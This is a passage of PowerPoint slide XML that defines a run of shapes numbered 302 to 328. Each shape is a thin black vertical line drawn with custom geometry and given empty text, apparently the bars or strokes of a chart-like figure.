                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1886919"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="object 302"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4776387" y="1948771"/>
            <a:ext cx="2517" cy="3742327"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1888489">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="1888045"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="object 303"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4804020" y="1909690"/>
            <a:ext cx="0" cy="3781338"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1908175">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1907766"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="object 304"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4802105" y="1912114"/>
            <a:ext cx="2517" cy="3778821"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1906905">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="1906543"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="object 305"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4831872" y="1789570"/>
            <a:ext cx="0" cy="3900881"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1968500">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1968377"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="object 306"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4831599" y="1787608"/>
            <a:ext cx="1258" cy="3903397"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1969770">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="1969372"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="object 307"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4859777" y="1802441"/>
            <a:ext cx="0" cy="3888297"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1962150">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1961888"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="object 308"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4859505" y="1804864"/>
            <a:ext cx="3775" cy="3885781"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905" h="1960880">
                <a:moveTo>
                  <a:pt x="687" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="687" y="1960664"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="object 309"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4887685" y="1746672"/>
            <a:ext cx="0" cy="3943663"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1990089">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1990025"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="object 310"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4886866" y="1744707"/>
            <a:ext cx="1258" cy="3946181"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1991360">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="1991021"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="object 311"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4915537" y="1765440"/>
            <a:ext cx="0" cy="3924787"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1980564">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1980554"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="object 312"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4915263" y="1764861"/>
            <a:ext cx="2517" cy="3926048"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1981200">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="1980852"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="object 313"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4943443" y="1902182"/>
            <a:ext cx="0" cy="3788888"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1911985">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1911550"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="object 314"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4941528" y="1902986"/>
            <a:ext cx="2517" cy="3787629"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1911350">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="1911149"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="object 315"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4971295" y="1896820"/>
            <a:ext cx="0" cy="3793921"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1914525">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1914256"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="object 316"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4971023" y="1894858"/>
            <a:ext cx="1258" cy="3796438"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1915795">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="1915251"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="object 317"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4999202" y="2278604"/>
            <a:ext cx="0" cy="3412641"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1722120">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1721601"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="object 318"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4996205" y="2278853"/>
            <a:ext cx="3775" cy="3411383"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905" h="1721485">
                <a:moveTo>
                  <a:pt x="687" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="687" y="1721476"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="object 319"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5027108" y="2292557"/>
            <a:ext cx="0" cy="3398800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1715135">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1714560"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="object 320"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5026289" y="2291173"/>
            <a:ext cx="1258" cy="3400058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1715770">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="1715258"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="object 321"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5054960" y="2712964"/>
            <a:ext cx="0" cy="2977253"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1502410">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1502411"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="object 322"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5054687" y="2715976"/>
            <a:ext cx="2517" cy="2974736"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1501139">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="1500890"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="object 323"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5082866" y="2732280"/>
            <a:ext cx="0" cy="2958378"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1492885">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1492663"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="object 324"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080951" y="2730894"/>
            <a:ext cx="2517" cy="2959636"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1493520">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="1493362"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="object 325"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110226" y="3255666"/>
            <a:ext cx="0" cy="2434905"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1228725">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1228547"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="object 326"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109954" y="3255365"/>
            <a:ext cx="1258" cy="2434905"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1228725">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="1228699"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="object 327"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5138079" y="3208487"/>
            <a:ext cx="0" cy="2482722"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1252855">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1252350"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="object 328"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5135338" y="3210373"/>
            <a:ext cx="2517" cy="2480205"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1251585">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="1251403"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
